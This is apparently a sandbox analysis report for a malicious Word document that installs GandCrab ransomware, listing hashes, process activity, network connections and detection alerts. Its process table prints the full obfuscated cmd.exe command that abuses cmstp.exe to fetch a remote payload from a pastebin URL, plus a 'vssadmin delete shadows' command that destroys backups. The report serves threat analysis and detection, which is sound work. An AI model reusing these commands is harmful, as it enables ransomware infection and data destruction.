File name: | 5c195d95cd85701585e9d016b19a3106a008dc1145485d1f4ab11b17bea3cf11 |
Full analysis: | https://app.any.run/tasks/9d12d78a-c44f-4ea8-bc32-a9637a1d53c7 |
Verdict: | Malicious activity |
Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
Analysis date: | March 21, 2019, 05:52:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Jan 31 12:52:00 2019, Last Saved Time/Date: Mon Mar 18 19:17:00 2019, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0 |
MD5: | D5FED1C1EE4B000C0E80F30D4475DF97 |
SHA1: | E4AC8FD735712E30C61CACB4E725B17A680D48ED |
SHA256: | 5C195D95CD85701585E9D016B19A3106A008DC1145485D1F4AB11B17BEA3CF11 |
SSDEEP: | 1536:U+mYRu2kOH3pZpF9r0wqQK1uN28NP8KRIly+a9:U+humHZiu1a |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Admin |
Keywords: | - |
Comments: | - |
Template: | Normal |
LastModifiedBy: | Admin |
RevisionNumber: | 2 |
Software: | Microsoft Office Word |
TotalEditTime: | 1.0 minutes |
CreateDate: | 2019:02:28 12:52:00 |
ModifyDate: | 2019:03:18 19:17:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 23 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 26 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2368 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\5c195d95cd85701585e9d016b19a3106a008dc1145485d1f4ab11b17bea3cf11.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
1024 | cmd /V /C set "G5=s" && !G5!et "G6=\" && !G5!et "G=e" && !G5!et "G22=i" && !G5!et "G7=A" && !G5!et "G2=N" && !G5!et "G21=d" && c!G7!ll !G5!et "G4=%!G7!PP!G21!!G7!T!G7!%" && c!G7!ll !G5!et "G75=%R!G7!!G2!!G21!OM%" && !G5!et "G03=!G4!!G6!M!G22!cro!G5!oft!G6!T!G!mplat!G!s!G6!!G75!.txt" && !G5!et "G9="^" && (For %i in ("[v!G!r!G5!ion]" "!G5!ignatur!G!=$Wi!G2!dow!G5! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[D!G!faultIn!G5!tall_Singl!G!U!G5!er]" "UnR!G!gi!G5!t!G!rOCXs=G54" "[G54]" "%11%\%G59_1%%G59_2%%G59_3%,NI,%G0_1%%G0_2%%G0_3%%G0_4%%G0_5%%G0_6%%G0_7%%G0_8%%G0_9%%G0_10%%G0_11%%G0_12%%G0_13%%G0_14%%G0_15%%G0_16%" "[!G5!tring!G5!]" "G0_1=ht" "G0_2=tp" "G0_3=:/" "G0_4=/p" "G0_5=as" "G0_6=te" "G0_7=bi" "G0_8=n." "G0_9=co" "G0_10=m/" "G0_11=ra" "G0_12=w/" "G0_13=kV" "G0_14=kC" "G0_15=4M" "G0_16=A3" "G59_2=rO" "G59_1=sC" "G59_3=bJ" ) do @echo %~i)>"!G03!" && echo !G5!erv!G22!ceNam!G!=!G9! !G9!>>!G03! && echo !G5!hortSvcN!G7!me=!G9! !G9!>>!G03! && c!G7!ll !G5!et "G19=%WI!G2!!G21!IR%" && !G5!t!G7!rt "" !G19!!G6!Sy!G5!t!G!m32!G6!cm!G5!tp.!G!x!G! /s /ns "!G03!" | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3424 | C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\Templates\29908.txt" | C:\Windows\System32\cmstp.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile Installer Exit code: 0 Version: 7.02.7600.16385 (win7_rtm.090713-1255) | ||||
2708 | "C:\Users\admin\AppData\Roaming\Microsoft\38389.exe" | C:\Users\admin\AppData\Roaming\Microsoft\38389.exe | cmstp.exe | |
User: admin Integrity Level: MEDIUM | ||||
4072 | "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet | C:\Windows\system32\cmd.exe | 38389.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2200 | vssadmin delete shadows /all /quiet | C:\Windows\system32\vssadmin.exe | — | cmd.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Command Line Interface for Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1048 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR959F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF81D316BBCDB17BB9.TMP | — | |
MD5:— | SHA256:— | |||
2368 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A3D37A96BE99E1B37F142EAB31105E77 | SHA256:10776DED098C89C43628A733533878C3854AA3666210F1501E5D0D74311EF8F0 | |||
1024 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\Templates\29908.txt | ini | |
MD5:86416DF51EFBD867FA23AB2B3AC2E80F | SHA256:6B1A40D4C75A9DDA865DDABF749AC6ABDBC0BED002EB3BD6C24ADAE6CF87A28E | |||
2368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3726DC5F.wmf | wmf | |
MD5:9B958D431B80584579043950B6329CC2 | SHA256:0C014D127F39FDEEDFA2229D89442011E65B0B09A38F748231D64FCE5E29224E | |||
3424 | cmstp.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\kVkC4MA3[1].txt | xml | |
MD5:E3FBA9C6E6BEAE3048460ADDFE573FED | SHA256:2268F74E4C7A9D94E6811EF5D2669F1555528BC83B53C5C3ABDC4153E75793FE | |||
2368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$195d95cd85701585e9d016b19a3106a008dc1145485d1f4ab11b17bea3cf11.doc | pgc | |
MD5:D2043D257379EBA86ECFFFDF2E5418CC | SHA256:78F79086BF718E6D8BEC9A3AFC126022BBE3AD5159DCC5B1AF98D0BDCC28CA2E | |||
2368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\SystemMonitor.exd | tlb | |
MD5:FE30FA2E71DDFEEBA07E7F3BDEFCD355 | SHA256:F9D3A4CFED93E2D17F9C0B6BB13B6BAE7A74BA3D6356E33BD448CE78A3E9EFBE | |||
2708 | 38389.exe | C:\PerfLogs\Admin\CCVIZCXLM-MANUAL.txt | text | |
MD5:7BEA31D7811BC96504124709F2CE84E5 | SHA256:D8F43D158B29300044D25625506892ABE84B894A77FA904D5BB6CC180BAEDECF | |||
2368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E8515BBF-40B3-419D-9AFC-8BC95B420799}.tmp | binary | |
MD5:27066B05087864C3ECC1DB16CA4C4AEF | SHA256:8E5A2083B65787CAF1DB9AB1D6F3FF2192E88277259BB224CE15A4A232428B5D |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3424 | cmstp.exe | GET | 200 | 104.20.208.21:80 | http://pastebin.com/raw/kVkC4MA3 | US | xml | 158 Kb | shared |
2708 | 38389.exe | GET | 301 | 107.173.49.208:80 | http://www.kakaocorp.link/ | US | html | 162 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3424 | cmstp.exe | 104.20.208.21:80 | pastebin.com | Cloudflare Inc | US | shared |
2708 | 38389.exe | 107.173.49.208:80 | www.kakaocorp.link | ColoCrossing | US | malicious |
2708 | 38389.exe | 107.173.49.208:443 | www.kakaocorp.link | ColoCrossing | US | malicious |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
www.kakaocorp.link |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3424 | cmstp.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
3424 | cmstp.exe | A Network Trojan was detected | MALWARE [PTsecurity] Squiblydoo Scriptlet |
2708 | 38389.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
2708 | 38389.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |